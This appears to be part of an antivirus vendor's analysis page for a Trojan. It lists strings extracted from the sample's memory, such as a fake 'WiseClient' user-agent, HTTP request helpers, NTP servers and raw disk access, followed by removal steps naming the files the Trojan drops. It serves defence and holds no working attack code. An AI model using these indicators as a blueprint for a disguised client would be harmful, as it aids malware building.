/Api/DecodeResult.aspx
ID/KEY/
ByTypeBytes.JPG
%d-%d-%d
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.5;
WiseClient-2.0.0.5
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
ServerPort
UUExtConfig.ini
-:-:-.%d
tCRYPTDLL.DLL
3.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
\\.\PHYSICALDRIVE0
Microsoft Windows Millennium Edition

%original file name%.exe_312_rwx_009E9000_00002000:


%original file name%.exe_312_rwx_01118000_0000C000:


%original file name%.exe_312_rwx_011AD000_000CA000:


%original file name%.exe_312_rwx_10000000_0003F000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\sqlite3.dll (1825 bytes)
    C:\qyd1.edb (260 bytes)
    C:\qyd.db-journal (1594 bytes)
    C:\qyd2.enx (1 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
